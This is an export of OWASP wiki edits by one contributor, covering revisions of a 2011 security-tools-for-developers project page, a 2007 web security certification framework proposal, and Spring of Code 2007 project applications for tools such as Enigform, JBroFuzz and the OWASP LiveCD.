<div>OWASP STD Project Banner</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114880OWASP Security Tools for Developers Project2011-07-31T19:04:31Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Asvs-ad-where-at.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' <br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
|<br />
<br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will inlcude it may inlcude IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114879OWASP Security Tools for Developers Project2011-07-31T18:49:54Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Asvs-ad-where-at.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' <br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will inlcude it may inlcude IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114878OWASP Security Tools for Developers Project2011-07-31T18:43:53Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Asvs-ad-where-at.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion'''<br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader Mark Curphey&nbsp;[mailto:owasp@owasp.org contact us]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will inlcude it may inlcude IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|} <br />
<br />
Project About <br />
<br />
{{:Projects/OWASP Development Guide | Project About}} <br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114877OWASP Security Tools for Developers Project2011-07-31T18:40:25Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Asvs-ad-where-at.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion'''<br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader Mark Curphey&nbsp;[mailto:owasp@owasp.org contact us]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will inlcude it may inlcude IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Planning<br />
*September - Sprint 1<br />
*October - Sprint 2<br />
*November - Sprint 3<br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
Project About <br />
<br />
{{:Projects/OWASP Development Guide | Project About}} <br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=SpoC_007_-_The_OWASP_Web_Security_Certification_Framework&diff=21634SpoC 007 - The OWASP Web Security Certification Framework2007-09-10T14:40:52Z<p>Mcurphey: /* Mark Curphey – The OWASP Web Security Certification Framework */</p>
<hr />
<div>'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''<br />
<br />
<br />
'''AoC Candidate''': Mark Curphey<br />
<br />
'''Project coordinator''': Dinis Cruz<br />
<br />
'''Project Progress''': 45% Complete, [[SpoC 007 - OWASP Web Security Certification Framework - Progress Page|Progress Page]]<br />
<br />
Web site owners need a widely published and consensus driven set of criteria to design, develop, deploy and maintain secure web sites. This criteria and claims of compliance with it need to be able to be provided to a wide range of stakeholders including customers, regulators and business partners. <br />
<br />
This document is a discussion document created by Mark Curphey . It was sponsored and produced as part of the OWASP Spring of Code, 2007 and proposes an evaluation and certification scheme for the security of web sites including recommendations for how the evaluation and certification process itself could work. This work is intended to be openly published for a reasonable period of time for public discussion, debate and feedback. After this period the OWASP Board will work with interested parties to determine any appropriate next steps. These may include adoption or integration into existing standards or the creation of something new.<br />
The evaluation and certification scheme proposed here takes into account the motivations and needs of a variety of stakeholders. Many people including the author have been highly critical of the Payment Card Industry Data Security Standard (PCI DSS). The OWASP Web Security Certification Criteria is not a proposal to replace the PCI DSS and is not officially related in anyway shape or form. PCI DSS has been taken into account however we have intentionally chosen not to build upon or build around key PCI issues that we consider ill-conceived. In short we have decided to build on solid foundations from the ground up.<br />
<br />
It is very important to understand that in itself this document and the project that supports it is not an evaluation scheme or criteria, but a proposal for what an effective one may look like. In fact the scheme has been created in such as way as to provide a framework from which to derive domain specific evaluation schemes from (US financial services, UK Gov or Indian Insurance). This document itself comprises of two main parts;<br />
<br />
Part 1 – Implementation Considerations. This section describes key processes and how they would work in order for the evaluation and certification scheme to be effective. <br />
Part 2 – Evaluation Criteria. This section describes the actual criteria being proposed. It adopts the recommendations from Part 1.<br />
You can send your feedback directly to mark@curphey.com or at the OWASP mailing list dedicated to this project (https://lists.owasp.org/mailman/listinfo/owasp-webcert).<br />
We hope this document provides value and provokes thought to all those identified in the stakeholders section. <br />
<br />
Kind regards, Mark Curphey and the entire OWASP Project Team.</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_Web_Security_Certification_Framework_-_Progress_Page&diff=21633SpoC 007 - OWASP Web Security Certification Framework - Progress Page2007-09-10T14:39:15Z<p>Mcurphey: New page: The OWASP Web Security Evaluation and Certification project is well underway. In fact at this point in writing I intend to fully complete the first draft by COB Friday September the 10th. ...</p>
<hr />
<div>The OWASP Web Security Evaluation and Certification project is well underway. In fact at this point in writing I intend to fully complete the first draft by COB Friday September the 10th.<br />
<br />
So far we have met the following milestones;<br />
<br />
Defined the criteria for a good standard and set out key proposals for consideration<br />
Defined the structure for a scaleable scheme and built the generic framework<br />
Defined the generic controls for the technology section<br />
Defined the generic controls for the process section<br />
<br />
Left to do<br />
<br />
Define controls for the people section<br />
Refine all controls<br />
<br />
Configure all controls to create a reference implementation<br />
<br />
There are several services companies already planning to offer services around this project and several banks planning to adopt it for their 3rd party security assessment criteria. This is very encouraging!</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&diff=17509OWASP Spring Of Code 2007 Applications2007-03-28T15:06:07Z<p>Mcurphey: /* Mark Curphey – A Better Web Security Evaluation Criteria */</p>
<hr />
<div>This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]<br />
<br />
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''<br />
<br />
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application<br />
<br />
---------<br />
<br />
<br />
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:<br />
<br />
== {Your first name or Alias} - {Project name} ==<br />
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].<br />
<br />
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.<br />
<br />
* Your educational and professional background<br />
<br />
* Application security experience and accomplishments<br />
<br />
* Participation and leadership in open communities<br />
<br />
* The opportunity, challenges, issues or need your proposal addresses<br />
<br />
* Objectives or ways in which you will meet the goal(s)<br />
<br />
* Specific activities and who will carry out these activities<br />
<br />
* Specific deliverables and a rough project schedule so we can track progress<br />
<br />
* Long-term vision for the project<br />
<br />
* Any other reasons why you and your project should be selected<br />
<br />
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==<br />
<br />
I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of<br />
information systems security since 1994, when BBSes and Linux still lived together.<br />
<br />
A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].<br />
<br />
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].<br />
<br />
=== Accomplishments ===<br />
<br />
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed <br />
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written<br />
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing<br />
an Internet Draft to be proposed for RFC regarding Enigform.<br />
<br />
=== Community ===<br />
<br />
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio<br />
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,<br />
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].<br />
<br />
=== My Project ===<br />
<br />
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].<br />
<br />
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.<br />
<br />
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].<br />
<br />
=== Long Term ===<br />
<br />
Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers<br />
and/or programming languages, and also provide OpenPGP De/Encryption support.<br />
<br />
<br />
=== Why should I be selected ===<br />
<br />
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the<br />
international security community, and I firmly believe Enigform is my greatest idea so far.<br />
<br />
== Eoin Keary - Code review Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the OWASP Code review guide during this period.<br />
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. <br />
<br />
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.<br />
<br />
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.<br />
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.<br />
<br />
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.<br />
Code review methodologies also need to be discussed.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the code review guide:<br />
* Add additional areas relating to the code review process such as:<br />
** Benefits and pitfalls<br />
** Methodology<br />
** The code review process<br />
*** Transactional analysis<br />
*** Managing the code review process<br />
*** Assigning risk to findings<br />
<br />
** Technical guides<br />
*** Language specific best practice <br />
*** Java <br />
*** .NET <br />
*** PHP <br />
*** MySQL <br />
*** Stored Procs <br />
*** C/C++ <br />
<br />
** Code review by vulnerability:<br />
*** Reviewing Code for Buffer Overruns and Overflows <br />
*** Reviewing Code for OS Injection<br />
*** Reviewing Code for SQL Injection<br />
*** Reviewing Code for Data Validation<br />
*** Reviewing code for XSS issues<br />
*** Reviewing Code for Error Handling<br />
*** Reviewing Code for Logging Issues<br />
*** Reviewing The Secure Code Environment<br />
*** Reviewing code for Authorization Issues<br />
*** Reviewing code for Authentication Issues<br />
*** Reviewing code for Session Integrity<br />
*** Reviewing code for Cross Site Request Forgery<br />
*** Reviewing code for Cryptography implementation issues<br />
*** Reviewing code Dangerous HTTP Methods (Deployment)<br />
*** Race Conditions <br />
<br />
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.<br />
<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. <br />
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. <br />
<br />
I have always delivered any work I have volunteered for on time. <br />
<br />
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.<br />
<br />
== Paolo Perego - Owasp Orizon Project ==<br />
* '''Executive Summary''':<br />
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.<br />
<br />
I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.<br />
<br />
Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.<br />
<br />
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
Completing the static code review API section<br />
* improving programming language to XML translator<br />
* improving security best practices code review scan library<br />
* improving secure coding fashion best practices library<br />
* writing the pattern matching scan using the aformentioned libraries<br />
Writing the java source code enforment objects<br />
* writing an object to handle form data values to avoid XSS<br />
* writing an object to handle form data values to avoid SQL Injection<br />
* writing an object to handle HttpRequest and HttpSession objects<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.<br />
<br />
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.<br />
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.<br />
<br />
I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.<br />
<br />
== Sebastien Deleersnyder - OWASP Education Project ==<br />
* '''Executive Summary''':<br />
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. <br />
<br />
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. <br />
<br />
* '''Objectives and Deliverables''':<br />
Currently the project goals are to create Educational Tracks: <br />
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past<br />
* A "Web Application Security Primer" Track for beginners (4 hours) <br />
* A "What developers should know on Web Application Security" Track for developers (4 hours) <br />
<br />
* '''Why you should be sponsored for the project''': <br />
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.<br />
<br />
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.<br />
<br />
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.<br />
<br />
* '''More details''': <br />
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.<br />
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.<br />
<br />
== Subere - OWASP JBroFuzz Project ==<br />
<br />
==== Overview ==== <br />
<br />
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.<br />
<br />
==== Fuzzing ==== <br />
<br />
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.<br />
<br />
==== Objectives ==== <br />
<br />
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):<br />
<br />
* '''Open Source Tab'''<br />
* '''NTLM Brute Force over HTTP/S Tab'''<br />
* '''Pure HTTP/S Fuzzing using HTTPClient'''<br />
* '''Blind SQL Injection Fuzzing Tab'''<br />
<br />
At the same time, the following existing tabs need to be updated and made more robust (details in next section):<br />
<br />
* '''TCP Fuzzing tab allowing graph outputs'''<br />
* '''TCP Sniffing tab update thread Agent Queue'''<br />
* '''Update Generators file format'''<br />
* '''Include SOAP and XML fuzzing'''<br />
<br />
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.<br />
<br />
==== Deliverables ==== <br />
<br />
Based on the above, the new code elements that will be added are as follows:<br />
<br />
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''<br />
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''<br />
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''<br />
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''<br />
<br />
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: <br />
<br />
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''<br />
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''<br />
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''<br />
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''<br />
<br />
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.<br />
<br />
==== Background ==== <br />
<br />
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. <br />
<br />
Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.<br />
<br />
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.<br />
<br />
==== Why should JBroFuzz be sponsored? ==== <br />
<br />
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.<br />
<br />
Keep the code platform independent adds a huge advantage. <br />
<br />
Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.<br />
<br />
== Joshua Perrymon - OWASP LiveCD Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the second version of the OWASP LiveCD during this period.<br />
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training. <br />
<br />
In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the LiveCD:<br />
* Complete OWASP branding<br />
* Add OWASP wiki<br />
* Add encryption capabilities<br />
* Add more OWASP tools<br />
* Add more pen-test tools such as;<br />
VOIP, RFID, BlueTooth, Wireless, etc..<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
